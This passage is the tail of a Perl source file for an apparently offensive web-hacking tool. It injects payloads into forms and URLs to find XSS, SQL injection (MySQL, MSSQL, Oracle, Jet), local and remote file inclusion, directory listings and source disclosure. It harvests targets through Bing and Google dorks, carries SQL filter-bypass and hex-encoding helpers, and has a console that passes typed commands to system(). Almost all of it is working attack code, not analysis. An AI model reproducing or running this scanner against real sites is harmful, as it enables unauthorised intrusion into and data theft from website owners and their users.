4727 | my $codeuno = $nave->post( $page, \@preuno )->content; | |
4728 | my $codedos = $nave->post( $page, \@predos )->content; | |
4729 | if ( $codeuno =~ | |
4730 | /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig | |
4731 | or $codedos =~ | |
4732 | /<script>alert\(String.fromCharCode\(101,115,116,111,121,100,101,110,117,101,118,111,101,110,101,115,116,111\)\)<\/script>/ig | |
4733 | ) | |
4734 | { | |
4735 | if ( $test->attr(name) eq "" | |
4736 | or $test->attr(name) eq " " ) | |
4737 | { | |
4738 | push( @post_founds, $contador_forms ); | |
4739 | } | |
4740 | else { | |
4741 | push( @post_founds, $test->attr(name) ); | |
4742 | } | |
4743 | } | |
4744 | } | |
4745 | } | |
4746 | else { #Fin de metodo POST | |
4747 | my @inputs = $test->inputs; | |
4748 | for my $in (@inputs) { | |
4749 | if ( $in->type eq "submit" ) { | |
4750 | if ( $in->name eq "" ) { | |
4751 | push( @botones_names, "submit" ); | |
4752 | } | |
4753 | push( @botones_names, $in->name ); | |
4754 | push( @botones_values, $in->value ); | |
4755 | } | |
4756 | else { | |
4757 | $orden .= '' . $in->name . '=' . $valor . '&'; | |
4758 | } | |
4759 | } | |
4760 | chop($orden); | |
4761 | for my $n ( 0 .. int(@botones_names) - 1 ) { | |
4762 | my $partedos = | |
4763 | "&" . $botones_names[$n] . "=" . $botones_values[$n]; | |
4764 | my $final = $orden . $partedos; | |
4765 | for my $strin (@pa) { | |
4766 | chomp $strin; | |
4767 | $final =~ s/doddyhackman/$strin/; | |
4768 | $code = toma( $page . "?" . $final ); | |
4769 | my $strin = "\Q$strin\E"; | |
4770 | if ( $code =~ /$strin/ ) { | |
4771 | push( @get_founds, $page . "?" . $final ); | |
4772 | } | |
4773 | } | |
4774 | } | |
4775 | } | |
4776 | } | |
4777 | ||
4778 | my @get_founds = repes(@get_founds); | |
4779 | if ( int(@get_founds) ne 0 ) { | |
4780 | for (@get_founds) { | |
4781 | $total_vulnerables++; | |
4782 | savefile( "xss-logs.txt", "[+] XSS Found : $_" ); | |
4783 | printear( $espacio_scan . "[+] XSS Found : $_\n\a", | |
4784 | "text", "11", "5" ); | |
4785 | } | |
4786 | } | |
4787 | ||
4788 | my @post_founds = repes(@post_founds); | |
4789 | if ( int(@post_founds) ne 0 ) { | |
4790 | for my $t (@post_founds) { | |
4791 | if ( $t =~ /^\d+$/ ) { | |
4792 | $total_vulnerables++; | |
4793 | savefile( "xss-logs.txt", "[+] XSS : Form $t in $page" ); | |
4794 | printear( | |
4795 | "\n[+] XSS : Form $t in $page\n\a", "text", | |
4796 | "11", "5" | |
4797 | ); | |
4798 | ||
4799 | } | |
4800 | } | |
4801 | printear( "[+] Values : @valores \n", "text", "11", "5" ); | |
4802 | } | |
4803 | } | |
4804 | ||
4805 | sub simple { | |
4806 | ||
4807 | my $code = toma( $_[0] ); | |
4808 | my @links = get_links($code); | |
4809 | ||
4810 | for my $com (@links) { | |
4811 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
4812 | if ( $path =~ /\/(.*)$/ ) { | |
4813 | my $path1 = $1; | |
4814 | $_[0] =~ s/$path1//ig; | |
4815 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); | |
4816 | if ( $path =~ /(.*)\// ) { | |
4817 | my $parche = $1; | |
4818 | unless ( $repetidos =~ /$parche/ ) { | |
4819 | $repetidos .= " " . $parche; | |
4820 | my $code = toma( "http://" . $auth . $parche ); | |
4821 | if ( $code =~ /Index of (.*)</ig ) { | |
4822 | my $dir_found = $1; | |
4823 | chomp $dir_found; | |
4824 | $total_vulnerables++; | |
4825 | printear( | |
4826 | "[+] Directory Found : " | |
4827 | . "http://" | |
4828 | . $auth | |
4829 | . $parche . "\n", | |
4830 | "text", "11", "5" | |
4831 | ); | |
4832 | savefile( "paths-logs.txt", | |
4833 | "[+] Directory Found : " | |
4834 | . "http://" | |
4835 | . $auth | |
4836 | . $parche ); | |
4837 | } | |
4838 | } | |
4839 | } | |
4840 | } | |
4841 | } | |
4842 | } | |
4843 | ||
4844 | sub scansql { | |
4845 | ||
4846 | my $page = shift; | |
4847 | my $copia = $page; | |
4848 | ||
4849 | $co = toma( $page . "'" ); | |
4850 | ||
4851 | if ( $co =~ | |
4852 | /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig | |
4853 | || $co =~ /mysql_free_result/ig | |
4854 | || $co =~ /mysql_fetch_assoc/ig | |
4855 | || $co =~ /mysql_num_rows/ig | |
4856 | || $co =~ /mysql_fetch_array/ig | |
4857 | || $co =~ /mysql_fetch_assoc/ig | |
4858 | || $co =~ /mysql_query/ig | |
4859 | || $co =~ /mysql_free_result/ig | |
4860 | || $co =~ /equivocado en su sintax/ig | |
4861 | || $co =~ /You have an error in your SQL syntax/ig | |
4862 | || $co =~ /Call to undefined function/ig ) | |
4863 | { | |
4864 | savefile( "sql-logs.txt", "[+] SQL : $page" ); | |
4865 | $total_vulnerables++; | |
4866 | printear( "[+] SQLI : $page\a\n", "text", "11", "5" ); | |
4867 | } | |
4868 | else { | |
4869 | ||
4870 | if ( $page =~ /(.*)\?(.*)/ ) { | |
4871 | my $page = $1; | |
4872 | ||
4873 | my @testar = HTML::Form->parse( toma($page), "/" ); | |
4874 | my @botones_names; | |
4875 | my @botones_values; | |
4876 | my @orden; | |
4877 | my @get_founds; | |
4878 | my @post_founds; | |
4879 | my @ordenuno; | |
4880 | my @ordendos; | |
4881 | ||
4882 | my $contador_forms = 0; | |
4883 | ||
4884 | my $valor = "doddyhackman"; | |
4885 | ||
4886 | for my $test (@testar) { | |
4887 | $contador_forms++; | |
4888 | if ( $test->method eq "POST" ) { | |
4889 | my @inputs = $test->inputs; | |
4890 | for my $in (@inputs) { | |
4891 | if ( $in->type eq "submit" ) { | |
4892 | if ( $in->name eq "" ) { | |
4893 | push( @botones_names, "submit" ); | |
4894 | } | |
4895 | push( @botones_names, $in->name ); | |
4896 | push( @botones_values, $in->value ); | |
4897 | } | |
4898 | else { | |
4899 | push( @ordenuno, $in->name, "'" ); | |
4900 | } | |
4901 | } | |
4902 | ||
4903 | for my $n ( 0 .. int(@botones_names) - 1 ) { | |
4904 | my @preuno = @ordenuno; | |
4905 | push( @preuno, | |
4906 | $botones_names[$n], $botones_values[$n] ); | |
4907 | my $code = $nave->post( $page, \@preuno )->content; | |
4908 | if ( $code =~ | |
4909 | /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig | |
4910 | || $code =~ /mysql_free_result/ig | |
4911 | || $code =~ /mysql_fetch_assoc/ig | |
4912 | || $code =~ /mysql_num_rows/ig | |
4913 | || $code =~ /mysql_fetch_array/ig | |
4914 | || $code =~ /mysql_fetch_assoc/ig | |
4915 | || $code =~ /mysql_query/ig | |
4916 | || $code =~ /mysql_free_result/ig | |
4917 | || $code =~ /equivocado en su sintax/ig | |
4918 | || $code =~ | |
4919 | /You have an error in your SQL syntax/ig | |
4920 | || $code =~ /Call to undefined function/ig ) | |
4921 | { | |
4922 | if ( $test->attr(name) eq "" | |
4923 | or $test->attr(name) eq " " ) | |
4924 | { | |
4925 | push( @post_founds, $contador_forms ); | |
4926 | } | |
4927 | else { | |
4928 | push( @post_founds, $test->attr(name) ); | |
4929 | } | |
4930 | } | |
4931 | } | |
4932 | } | |
4933 | ||
4934 | my @post_founds = repes(@post_founds); | |
4935 | if ( int(@post_founds) ne 0 ) { | |
4936 | for my $t (@post_founds) { | |
4937 | if ( $t =~ /^\d+$/ ) { | |
4938 | $total_vulnerables++; | |
4939 | savefile( "sql-logs.txt", | |
4940 | "[+] SQLI : Form $t in $page" ); | |
4941 | printear( | |
4942 | "[+] SQLI : Form $t in $page\n\a", "text", | |
4943 | "11", "5" | |
4944 | ); | |
4945 | } | |
4946 | } | |
4947 | } | |
4948 | } | |
4949 | } | |
4950 | } | |
4951 | } | |
4952 | ||
4953 | sub access { | |
4954 | ||
4955 | my $page = shift; | |
4956 | $code1 = toma( $page . "'" ); | |
4957 | if ( $code1 =~ /Microsoft JET Database/ig | |
4958 | or $code1 =~ /ODBC Microsoft Access Driver/ig ) | |
4959 | { | |
4960 | printear( "[+] Jet DB : $page\a\n", "text", "11", "5" ); | |
4961 | savefile( "jetdb-logs.txt", $page ); | |
4962 | $total_vulnerables++; | |
4963 | } | |
4964 | } | |
4965 | ||
4966 | sub mssql { | |
4967 | ||
4968 | my $page = shift; | |
4969 | $code1 = toma( $page . "'" ); | |
4970 | if ( $code1 =~ /ODBC SQL Server Driver/ig ) { | |
4971 | printear( "[+] MSSQL : $page\a\n", "text", "11", "5" ); | |
4972 | savefile( "mssql-logs.txt", $page ); | |
4973 | $total_vulnerables++; | |
4974 | } | |
4975 | } | |
4976 | ||
4977 | sub oracle { | |
4978 | ||
4979 | my $page = shift; | |
4980 | $code1 = toma( $page . "'" ); | |
4981 | if ( $code1 =~ /Microsoft OLE DB Provider for Oracle/ig ) { | |
4982 | printear( "[+] Oracle : $page\a\n", "text", "11", "5" ); | |
4983 | savefile( "oracle-logs.txt", $page ); | |
4984 | $total_vulnerables++; | |
4985 | } | |
4986 | } | |
4987 | ||
4988 | sub rfi { | |
4989 | my $page = shift; | |
4990 | $code1 = toma( $page . "http:/www.supertangas.com/" ); | |
4991 | if ( $code1 =~ /Los mejores TANGAS de la red/ig ) | |
4992 | { #Esto es conocimiento de verdad xDDD | |
4993 | printear( "[+] RFI : $page\a\n", "text", "11", "5" ); | |
4994 | savefile( "rfi-logs.txt", $page ); | |
4995 | $total_vulnerables++; | |
4996 | } | |
4997 | } | |
4998 | ||
4999 | sub lfi { | |
5000 | my $page = shift; | |
5001 | $code1 = toma( $page . "'" ); | |
5002 | if ( $code1 =~ /No such file or directory in <b>(.*)<\/b> on line/ig ) { | |
5003 | printear( "[+] LFI : $page\a\n", "text", "11", "5" ); | |
5004 | savefile( "lfi-logs.txt", $page ); | |
5005 | $total_vulnerables++; | |
5006 | } | |
5007 | } | |
5008 | ||
5009 | sub fsd { | |
5010 | ||
5011 | my $page = shift; | |
5012 | my $archivo; | |
5013 | ||
5014 | if ( $page =~ /(.*)\/(.*)\?/ ) { | |
5015 | $archivo = $2; | |
5016 | } | |
5017 | ||
5018 | my $code = toma( $page . $archivo ); | |
5019 | ||
5020 | if ( $code =~ /header\((.*)Content-Disposition: attachment;/ig ) { | |
5021 | ||
5022 | printear( "[+] Full Source Discloure : $page\a\n", | |
5023 | "text", "11", "5" ); | |
5024 | $total_vulnerables++; | |
5025 | savefile( "fpd-logs.txt", $page ); | |
5026 | ||
5027 | } | |
5028 | ||
5029 | } | |
5030 | ||
5031 | sub men { | |
5032 | printear( "\n[+] Scan Type : \n", "text", "5", "5" ); | |
5033 | printear( " | |
5034 | [X] : XSS | |
5035 | [S] : SQL GET/POST | |
5036 | [K] : SQL GET | |
5037 | [Q] : SQL GET + Admin | |
5038 | [Y] : Directory listing | |
5039 | [M] : MSSQL | |
5040 | [J] : Jet Database | |
5041 | [O] : Oracle | |
5042 | [L] : LFI | |
5043 | [R] : RFI | |
5044 | [F] : Full Source Discloure | |
5045 | [HT] : HTTP Information | |
5046 | [A] : All | |
5047 | ", "logos", "13", "5" ); | |
5048 | my $option = printear( "\n[Options] : ", "stdin", "11", "13" ); | |
5049 | return $option; | |
5050 | } | |
5051 | ||
5052 | sub finish_now { | |
5053 | adios(); | |
5054 | } | |
5055 | ||
5056 | sub bing { | |
5057 | ||
5058 | my ( $a, $b ) = @_; | |
5059 | for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) { | |
5060 | my $code = | |
5061 | toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages ); | |
5062 | ||
5063 | while ( $code =~ /<h3><a href="(.*?)"/mig ) { | |
5064 | push( @founds, $1 ); | |
5065 | } | |
5066 | ||
5067 | while ( $code =~ /<h2><a href="(.*?)"/mig ) { | |
5068 | push( @founds, $1 ); | |
5069 | } | |
5070 | } | |
5071 | my @founds = repes( cortar(@founds) ); | |
5072 | return @founds; | |
5073 | } | |
5074 | ||
5075 | sub google { | |
5076 | my ( $a, $b ) = @_; | |
5077 | my @founds; | |
5078 | for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) { | |
5079 | $code = | |
5080 | toma( "https://www.google.com.ar/search?hl=&q=" | |
5081 | . $a | |
5082 | . "&start=$pages" ); | |
5083 | while ( $code =~ /(?<="r"><. href=")(.+?)"/mig ) { | |
5084 | my $url = $1; | |
5085 | push( @founds, uri_unescape($url) ); | |
5086 | ||
5087 | } | |
5088 | } | |
5089 | my @founds = repes( cortar(@founds) ); | |
5090 | return @founds; | |
5091 | } | |
5092 | ||
5093 | } ## | |
5094 | ||
5095 | sub load_cmd { | |
5096 | ||
5097 | head_console(); | |
5098 | ||
5099 | sub head_console { | |
5100 | clean(); | |
5101 | printear( " | |
5102 | ||
5103 | ||
5104 | @@@@ @@@@ @ @ @@@ @@@@ @ @@@@@ | |
5105 | @ @ @ @ @@ @ @ @ @ @ @ @ | |
5106 | @ @ @ @@ @ @ @ @ @ @ | |
5107 | @ @ @ @ @ @ @ @ @ @ @ | |
5108 | @ @ @ @ @ @ @@@ @ @ @ @@@@ | |
5109 | @ @ @ @ @ @ @ @ @ @ @ | |
5110 | @ @ @ @ @@ @ @ @ @ @ | |
5111 | @ @ @ @ @ @@ @ @ @ @ @ @ | |
5112 | @@@@ @@@@ @ @ @@@ @@@@ @@@@@ @@@@@ | |
5113 | ||
5114 | ||
5115 | ||
5116 | ", "logos", "7", "5" ); | |
5117 | } | |
5118 | ||
5119 | while (1) { | |
5120 | my $cmd = printear( "\n[+] Command : ", "stdin", "11", "13" ); | |
5121 | print "\n"; | |
5122 | if ( $cmd eq "exit" ) { | |
5123 | adios(); | |
5124 | } | |
5125 | else { | |
5126 | my $data = getdatanownownownow(); | |
5127 | if ( $data =~ /colors=n/ ) { | |
5128 | system($cmd); | |
5129 | } | |
5130 | else { | |
5131 | cprint "\x037"; | |
5132 | system($cmd); | |
5133 | cprint "\x030"; | |
5134 | } | |
5135 | } | |
5136 | } | |
5137 | ||
5138 | } ## | |
5139 | ||
5140 | ## | |
5141 | ||
5142 | ##Funciones secundarias ### | |
5143 | ||
5144 | sub toma { | |
5145 | return $nave->get( $_[0] )->content; | |
5146 | } | |
5147 | ||
5148 | sub tomados { | |
5149 | return $nave->get( $_[0] ); | |
5150 | } | |
5151 | ||
5152 | sub tomar { | |
5153 | my ( $web, $var ) = @_; | |
5154 | return $nave->post( $web, [ %{$var} ] )->content; | |
5155 | } | |
5156 | ||
5157 | sub ver_length { | |
5158 | return true if length( $_[0] ) == 32; | |
5159 | } | |
5160 | ||
5161 | sub savefile { | |
5162 | open( SAVE, ">>logs/" . $_[0] ); | |
5163 | print SAVE $_[1] . "\n"; | |
5164 | close SAVE; | |
5165 | } | |
5166 | ||
5167 | sub get_links { | |
5168 | ||
5169 | $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); | |
5170 | return @links; | |
5171 | ||
5172 | sub agarrar { | |
5173 | my ( $a, %b ) = @_; | |
5174 | push( @links, values %b ); | |
5175 | } | |
5176 | } | |
5177 | ||
5178 | sub adios { | |
5179 | printear( "\n[+] Press the enter key to return to main menu\n", | |
5180 | "text", "13", "5" ); | |
5181 | <stdin>; | |
5182 | estoydentro(); | |
5183 | } | |
5184 | ||
5185 | sub savefilear { | |
5186 | open( SAVE, ">>logs/webs/" . $_[0] ); | |
5187 | print SAVE $_[1] . "\n"; | |
5188 | close SAVE; | |
5189 | } | |
5190 | ||
5191 | sub partimealmedio { | |
5192 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
5193 | my $save = $auth; | |
5194 | $save =~ s/:/_/; | |
5195 | return $save; | |
5196 | } | |
5197 | ||
5198 | sub encode { | |
5199 | my $string = $_[0]; | |
5200 | $hex = '0x'; | |
5201 | for ( split //, $string ) { | |
5202 | $hex .= sprintf "%x", ord; | |
5203 | } | |
5204 | return $hex; | |
5205 | } | |
5206 | ||
5207 | sub decode { | |
5208 | $_[0] =~ s/^0x//; | |
5209 | $encode = join q[], map { chr hex } $_[0] =~ /../g; | |
5210 | return $encode; | |
5211 | } | |
5212 | ||
5213 | sub bypass { | |
5214 | if ( $_[0] eq "/*" ) { return ( "/**/", "/**/" ); } | |
5215 | elsif ( $_[0] eq "%20" ) { return ( "%20", "%00" ); } | |
5216 | else { return ( "+", "--" ); } | |
5217 | } | |
5218 | ||
5219 | sub ascii { | |
5220 | return join ',', unpack "U*", $_[0]; | |
5221 | } | |
5222 | ||
5223 | sub ascii_de { | |
5224 | $_[0] = join q[], map { chr } split q[,], $_[0]; | |
5225 | return $_[0]; | |
5226 | } | |
5227 | ||
5228 | sub installer_kobra { | |
5229 | unless ( -d "/logs/webs" ) { | |
5230 | mkdir( "logs/", 777 ); | |
5231 | mkdir( "logs/webs/", 777 ); | |
5232 | chmod "logs/", "0777"; | |
5233 | chmod "logs/webs/", "0777"; | |
5234 | } | |
5235 | } | |
5236 | ||
5237 | sub cortar { | |
5238 | my @nuevo; | |
5239 | for (@_) { | |
5240 | if ( $_ =~ /=/ ) { | |
5241 | @tengo = split( "=", $_ ); | |
5242 | push( @nuevo, @tengo[0] . "=" ); | |
5243 | } | |
5244 | else { | |
5245 | push( @nuevo, $_ ); | |
5246 | } | |
5247 | } | |
5248 | return @nuevo; | |
5249 | } | |
5250 | ||
5251 | sub installer_par { | |
5252 | unless ( -d "logs/" ) { | |
5253 | mkdir( "logs/", "777" ); | |
5254 | chmod "logs/", "0777"; | |
5255 | } | |
5256 | } | |
5257 | ||
5258 | sub repes { | |
5259 | my @limpio; | |
5260 | foreach $test (@_) { | |
5261 | push @limpio, $test unless $repe{$test}++; | |
5262 | } | |
5263 | return @limpio; | |
5264 | } | |
5265 | ||
5266 | sub nombre { | |
5267 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); | |
5268 | return $auth; | |
5269 | } | |
5270 | ||
5271 | sub savewordss { | |
5272 | my @r; | |
5273 | my @words; | |
5274 | open( FILE, $_[0] ); | |
5275 | @words = <FILE>; | |
5276 | close FILE; | |
5277 | for (@words) { | |
5278 | push( @r, $_ ); | |
5279 | } | |
5280 | return (@r); | |
5281 | } | |
5282 | ||
5283 | sub savewords { | |
5284 | ||
5285 | open my $on, '<', $_[0]; | |
5286 | undef $/; | |
5287 | my $contenido = <$on>; | |
5288 | close $on; | |
5289 | ||
5290 | return $contenido; | |
5291 | ||
5292 | } | |
5293 | ||
5294 | sub borrar_archivos { | |
5295 | ||
5296 | opendir my ($list), $_[0]; | |
5297 | my @aborrar = readdir $list; | |
5298 | closedir $list; | |
5299 | ||
5300 | for my $borrar (@aborrar) { | |
5301 | if ( -f $_[0] . "/" . $borrar ) { | |
5302 | unlink( $_[0] . "/" . $borrar ); | |
5303 | } | |
5304 | } | |
5305 | ||
5306 | } | |
5307 | ||
5308 | sub getdatanownownownow { | |
5309 | open my $FILE, q[<], "data.txt"; | |
5310 | my $word = join q[], <$FILE>; | |
5311 | close $FILE; | |
5312 | return $word; | |
5313 | } | |
5314 | ||
5315 | sub savefil { | |
5316 | open( SAVE, ">>" . $_[0] ); | |
5317 | print SAVE $_[1]; | |
5318 | close SAVE; | |
5319 | } | |
5320 | ||
5321 | sub cargarlogs { | |
5322 | my $os = $^O; | |
5323 | if ( $os =~ /Win/ig ) { | |
5324 | system( "start " . $_[0] ); | |
5325 | } | |
5326 | else { | |
5327 | system( "firefox " . $_[0] ); | |
5328 | } | |
5329 | } | |
5330 | ||
5331 | sub system_leida { | |
5332 | my $os = $^O; | |
5333 | if ( $os =~ /Win/ig ) { | |
5334 | system( "start " . $_[0] ); | |
5335 | } | |
5336 | else { | |
5337 | system( "gedit " . $_[0] ); | |
5338 | } | |
5339 | } | |
5340 | ||
5341 | ## | |
5342 | ||
5343 | #The End ? |